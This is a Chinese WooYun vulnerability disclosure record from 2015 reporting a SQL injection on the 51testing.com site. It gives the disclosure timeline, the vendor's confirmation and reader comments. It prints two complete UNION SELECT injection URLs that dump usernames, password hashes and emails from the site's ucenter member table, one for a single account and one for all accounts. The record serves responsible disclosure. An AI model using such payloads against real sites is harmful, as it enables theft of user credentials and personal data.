缺陷编号:WooYun-2015-0125511
漏洞标题:51软件测试网主站SQL注入一枚(泄露75W会员信息)
相关厂商:51testing.com
漏洞作者:小杰哥
提交时间:2015-07-13 13:48
公开时间:2015-08-27 14:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开
75W会员信息
漏洞地址:http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments后面跟上语句查询http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%20where%20uid=1%23
http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%23
泄露75W会员信息
0.0
危害等级:高
漏洞Rank:15
确认时间:2015-07-1314:36
十分感谢!
暂无
是时候改密码了……
是时候改密码了……
不确认么?
是时候改密码了……
索要地址 然后就没有然后了.... 我家都是喝山泉水的没水表。
@小杰哥 其实大部分厂商都以为要完地址,系统会送礼物,这是系统最让人吐槽的一点,我有4个都这样
完了我又得开密码了
原文连接
的情况下转载,若非则不得使用我方内容。